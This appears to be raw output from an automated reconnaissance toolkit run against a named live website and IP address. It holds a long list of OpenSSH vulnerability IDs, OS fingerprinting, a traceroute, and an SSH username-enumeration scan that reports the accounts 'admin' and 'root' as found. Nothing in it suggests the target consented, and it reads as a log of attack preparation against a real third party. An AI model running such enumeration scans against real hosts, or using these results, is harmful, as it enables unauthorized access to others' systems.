| [130671] gsi-openssh-server 7.9p1 on Fedora /etc/gsissh/sshd_config weak authentication
| [130371] OpenSSH 7.9 scp Man-in-the-Middle directory traversal
| [130370] OpenSSH 7.9 Man-in-the-Middle spoofing
| [130369] OpenSSH 7.9 Encoding progressmeter.c refresh_progress_meter() spoofing
| [129007] OpenSSH 7.9 scp Client scp.c Filename privilege escalation
| [123343] OpenSSH up to 7.8 GSS2 auth-gss2.c information disclosure
| [123011] OpenSSH up to 7.7 auth2-gss.c Request information disclosure
| [112267] OpenSSH up to 7.3 sshd kex.c/packet.c NEWKEYS Message denial of service
| [108627] OpenSSH up to 7.5 Readonly Mode sftp-server.c process_open unknown vulnerability
| [94611] OpenSSH up to 7.3 Access Control privilege escalation
| [94610] OpenSSH up to 7.3 Shared Memory Manager privilege escalation
| [94608] OpenSSH up to 7.3 Unix-Domain Socket privilege escalation
| [94607] OpenSSH up to 7.3 Forwarded Agent Channel privilege escalation
| [90671] OpenSSH up to 7.2 auth-passwd.c auth_password denial of service
| [90405] OpenSSH up to 7.2p2 sshd information disclosure
| [90404] OpenSSH up to 7.2p2 sshd information disclosure
| [90403] OpenSSH up to 7.2p2 sshd CPU Exhaustion denial of service
| [89622] OpenSSH 7.2p2 Authentication Username information disclosure
| [81320] OpenSSH up to 7.2p1 X11 Authentication Credential xauth privilege escalation
| [80656] OpenBSD OpenSSH 7.1 X11 Forwarding privilege escalation
| [80330] OpenSSH up to 7.1p1 packet.c ssh_packet_read_poll2 memory corruption
|
| MITRE CVE - https://cve.mitre.org:
| [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
| [CVE-1999-0661] A system is running a version of software that was replaced with a Trojan Horse at one of its distribution points, such as (1) TCP Wrappers 7.6, (2) util-linux 2.9g, (3) wuarchive ftpd (wuftpd) 2.2 and 2.1f, (4) IRC client (ircII) ircII 2.2.9, (5) OpenSSH 3.4p1, or (6) Sendmail 8.12.6.
|
| SecurityFocus - https://www.securityfocus.com/bid/:
| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
| [75990] OpenSSH Login Handling Security Bypass Weakness
| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
| [61286] OpenSSH Remote Denial of Service Vulnerability
| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
| [30794] Red Hat OpenSSH Backdoor Vulnerability
| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
| [28531] OpenSSH ForceCommand Command Execution Weakness
| [28444] OpenSSH X Connections Session Hijacking Vulnerability
| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
| [20956] OpenSSH Privilege Separation Key Signature Weakness
| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
| [6168] OpenSSH Visible Password Vulnerability
| [5374] OpenSSH Trojan Horse Vulnerability
| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
| [4241] OpenSSH Channel Code Off-By-One Vulnerability
| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
| [2917] OpenSSH PAM Session Evasion Vulnerability
| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
| [2356] OpenSSH Private Key Authentication Check Vulnerability
| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
| [1334] OpenSSH UseLogin Vulnerability
|
| IBM X-Force - https://exchange.xforce.ibmcloud.com:
| [83258] GSI-OpenSSH auth-pam.c security bypass
| [82781] OpenSSH time limit denial of service
| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
| [72756] Debian openssh-server commands information disclosure
| [68339] OpenSSH pam_thread buffer overflow
| [67264] OpenSSH ssh-keysign unauthorized access
| [65910] OpenSSH remote_glob function denial of service
| [65163] OpenSSH certificate information disclosure
| [64387] OpenSSH J-PAKE security bypass
| [63337] Cisco Unified Videoconferencing OpenSSH weak security
| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
| [45202] OpenSSH signal handler denial of service
| [44747] RHEL OpenSSH backdoor
| [44280] OpenSSH PermitRootLogin information disclosure
| [44279] OpenSSH sshd weak security
| [44037] OpenSSH sshd SELinux role unauthorized access
| [43940] OpenSSH X11 forwarding information disclosure
| [41549] OpenSSH ForceCommand directive security bypass
| [41438] OpenSSH sshd session hijacking
| [40897] OpenSSH known_hosts weak security
| [40587] OpenSSH username weak security
| [37371] OpenSSH username data manipulation
| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
| [37112] RHSA update for OpenSSH signal handler race condition not installed
| [37107] RHSA update for OpenSSH identical block denial of service not installed
| [36637] OpenSSH X11 cookie privilege escalation
| [35167] OpenSSH packet.c newkeys[mode] denial of service
| [34490] OpenSSH OPIE information disclosure
| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
| [32975] Apple Mac OS X OpenSSH denial of service
| [32387] RHSA-2006:0738 updates for openssh not installed
| [32359] RHSA-2006:0697 updates for openssh not installed
| [32230] RHSA-2006:0298 updates for openssh not installed
| [32132] RHSA-2006:0044 updates for openssh not installed
| [30120] OpenSSH privilege separation monitor authentication verification weakness
| [29255] OpenSSH GSSAPI user enumeration
| [29254] OpenSSH signal handler race condition
| [29158] OpenSSH identical block denial of service
| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
| [25116] OpenSSH OpenPAM denial of service
| [24305] OpenSSH SCP shell expansion command execution
| [22665] RHSA-2005:106 updates for openssh not installed
| [22117] OpenSSH GSSAPI allows elevated privileges
| [22115] OpenSSH GatewayPorts security bypass
| [20930] OpenSSH sshd.c LoginGraceTime denial of service
| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
| [17213] OpenSSH allows port bouncing attacks
| [16323] OpenSSH scp file overwrite
| [13797] OpenSSH PAM information leak
| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
| [13264] OpenSSH PAM code could allow an attacker to gain access
| [13215] OpenSSH buffer management errors could allow an attacker to execute code
| [13214] OpenSSH memory vulnerabilities
| [13191] OpenSSH large packet buffer overflow
| [12196] OpenSSH could allow an attacker to bypass login restrictions
| [11970] OpenSSH could allow an attacker to obtain valid administrative account
| [11902] OpenSSH PAM support enabled information leak
| [9803] OpenSSH "
| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
| [9307] OpenSSH is running on the system
| [9169] OpenSSH "
| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
| [8383] OpenSSH off-by-one error in channel code
| [7647] OpenSSH UseLogin option arbitrary code execution
| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
| [7179] OpenSSH source IP access control bypass
| [6757] OpenSSH "
| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
| [5517] OpenSSH allows unauthorized access to resources
| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
|
| Exploit-DB - https://www.exploit-db.com:
| [21579] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2)
| [21578] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1)
| [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
| [21314] OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability
| [20253] OpenSSH 1.2 scp File Create/Overwrite Vulnerability
| [17462] FreeBSD OpenSSH 3.5p1 - Remote Root Exploit
| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
| [6094] Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth)
| [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
| [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
| [1572] Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service
| [258] glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x
| [26] OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh)
| [25] OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool
|
| OpenVAS (Nessus) - http://www.openvas.org:
| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
| [881183] CentOS Update for openssh CESA-2012:0884 centos6
| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
| [870763] RedHat Update for openssh RHSA-2012:0884-04
| [870129] RedHat Update for openssh RHSA-2008:0855-01
| [861813] Fedora Update for openssh FEDORA-2010-5429
| [861319] Fedora Update for openssh FEDORA-2007-395
| [861170] Fedora Update for openssh FEDORA-2007-394
| [861012] Fedora Update for openssh FEDORA-2007-715
| [840345] Ubuntu Update for openssh vulnerability USN-597-1
| [840300] Ubuntu Update for openssh update USN-612-5
| [840271] Ubuntu Update for openssh vulnerability USN-612-2
| [840268] Ubuntu Update for openssh update USN-612-7
| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
| [840214] Ubuntu Update for openssh vulnerability USN-566-1
| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
| [100584] OpenSSH X Connections Session Hijacking Vulnerability
| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
| [65987] SLES10: Security update for OpenSSH
| [65819] SLES10: Security update for OpenSSH
| [65514] SLES9: Security update for OpenSSH
| [65513] SLES9: Security update for OpenSSH
| [65334] SLES9: Security update for OpenSSH
| [65248] SLES9: Security update for OpenSSH
| [65218] SLES9: Security update for OpenSSH
| [65169] SLES9: Security update for openssh,openssh-askpass
| [65126] SLES9: Security update for OpenSSH
| [65019] SLES9: Security update for OpenSSH
| [65015] SLES9: Security update for OpenSSH
| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
| [61639] Debian Security Advisory DSA 1638-1 (openssh)
| [61030] Debian Security Advisory DSA 1576-2 (openssh)
| [61029] Debian Security Advisory DSA 1576-1 (openssh)
| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
| [60667] Slackware Advisory SSA:2008-095-01 openssh
| [59014] Slackware Advisory SSA:2007-255-01 openssh
| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
| [57492] Slackware Advisory SSA:2006-272-02 openssh
| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
| [57470] FreeBSD Ports: openssh
| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
| [56294] Slackware Advisory SSA:2006-045-06 openssh
| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
| [53788] Debian Security Advisory DSA 025-1 (openssh)
| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
| [11343] OpenSSH Client Unauthorized Remote Forwarding
| [10954] OpenSSH AFS/Kerberos ticket/token passing
| [10883] OpenSSH Channel Code Off by 1
| [10823] OpenSSH UseLogin Environment Variables
|
| SecurityTracker - https://www.securitytracker.com:
| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
|
| OSVDB - http://www.osvdb.org:
| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
| [56921] OpenSSH Unspecified Remote Compromise
| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
| [43745] OpenSSH X11 Forwarding Local Session Hijacking
| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
| [37315] pam_usb OpenSSH Authentication Unspecified Issue
| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
| [34601] OPIE w/ OpenSSH Account Enumeration
| [34600] OpenSSH S/KEY Authentication Account Enumeration
| [32721] OpenSSH Username Password Complexity Account Enumeration
| [30232] OpenSSH Privilege Separation Monitor Weakness
| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
| [29152] OpenSSH Identical Block Packet DoS
| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
| [22692] OpenSSH scp Command Line Filename Processing Command Injection
| [20216] OpenSSH with KerberosV Remote Authentication Bypass
| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
| [6601] OpenSSH *realloc() Unspecified Memory Errors
| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
| [6072] OpenSSH PAM Conversation Function Stack Modification
| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
| [5408] OpenSSH echo simulation Information Disclosure
| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
| [4536] OpenSSH Portable AIX linker Privilege Escalation
| [3938] OpenSSL and OpenSSH /dev/random Check Failure
| [3456] OpenSSH buffer_append_space() Heap Corruption
| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
| [2140] OpenSSH w/ PAM Username Validity Timing Attack
| [2112] OpenSSH Reverse DNS Lookup Bypass
| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
| [1853] OpenSSH Symbolic Link 'cookies' File Removal
| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
| [688] OpenSSH UseLogin Environment Variable Local Command Execution
| [642] OpenSSH Multiple Key Type ACL Bypass
| [504] OpenSSH SSHv2 Public Key Authentication Bypass
| [341] OpenSSH UseLogin Local Privilege Escalation
|_
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 10 hops

TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 171.47 ms 10.247.200.1
2 175.06 ms 213.184.122.97
3 171.52 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
4 171.88 ms bzq-179-124-185.cust.bezeqint.net (212.179.124.185)
5 231.10 ms bzq-219-189-6.cablep.bezeqint.net (62.219.189.6)
6 227.72 ms bzq-219-189-57.cablep.bezeqint.net (62.219.189.57)
7 234.71 ms linx-224.retn.net (195.66.224.193)
8 236.10 ms ae0-2.RT.IR9.AMS.NL.retn.net (87.245.232.123)
9 ...
10 240.59 ms 89.248.174.131
########################################################################################################################################
2609USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
2610RHOSTS => idolblog.tv
2611RHOST => idolblog.tv
2612[*] 89.248.174.131:22 - SSH - Using malformed packet technique
2613[*] 89.248.174.131:22 - SSH - Starting scan
2614[+] 89.248.174.131:22 - SSH - User 'admin' found
2615[-] 89.248.174.131:22 - SSH - User 'administrator' not found
2616[-] 89.248.174.131:22 - SSH - User 'anonymous' not found
2617[-] 89.248.174.131:22 - SSH - User 'backup' not found
2618[-] 89.248.174.131:22 - SSH - User 'bee' not found
2619[-] 89.248.174.131:22 - SSH - User 'ftp' not found
2620[-] 89.248.174.131:22 - SSH - User 'guest' not found
2621[-] 89.248.174.131:22 - SSH - User 'GUEST' not found
2622[-] 89.248.174.131:22 - SSH - User 'info' not found
2623[-] 89.248.174.131:22 - SSH - User 'mail' not found
2624[-] 89.248.174.131:22 - SSH - User 'mailadmin' not found
2625[-] 89.248.174.131:22 - SSH - User 'msfadmin' not found
2626[-] 89.248.174.131:22 - SSH - User 'mysql' not found
2627[-] 89.248.174.131:22 - SSH - User 'nobody' not found
2628[-] 89.248.174.131:22 - SSH - User 'oracle' not found
2629[-] 89.248.174.131:22 - SSH - User 'owaspbwa' not found
2630[-] 89.248.174.131:22 - SSH - User 'postfix' not found
2631[-] 89.248.174.131:22 - SSH - User 'postgres' not found
2632[-] 89.248.174.131:22 - SSH - User 'private' not found
2633[-] 89.248.174.131:22 - SSH - User 'proftpd' not found
2634[-] 89.248.174.131:22 - SSH - User 'public' not found
2635[+] 89.248.174.131:22 - SSH - User 'root' found
2636[-] 89.248.174.131:22 - SSH - User 'superadmin' not found
2637[-] 89.248.174.131:22 - SSH - User 'support' not found
2638[-] 89.248.174.131:22 - SSH - User 'sys' not found
2639[-] 89.248.174.131:22 - SSH - User 'system' not found
2640[-] 89.248.174.131:22 - SSH - User 'systemadmin' not found
2641[-] 89.248.174.131:22 - SSH - User 'systemadministrator' not found
2642[-] 89.248.174.131:22 - SSH - User 'test' not found
2643[-] 89.248.174.131:22 - SSH - User 'tomcat' not found
2644[-] 89.248.174.131:22 - SSH - User 'user' not found
2645[-] 89.248.174.131:22 - SSH - User 'webmaster' not found
2646[-] 89.248.174.131:22 - SSH - User 'www-data' not found
2647[-] 89.248.174.131:22 - SSH - User 'Fortimanager_Access' not found
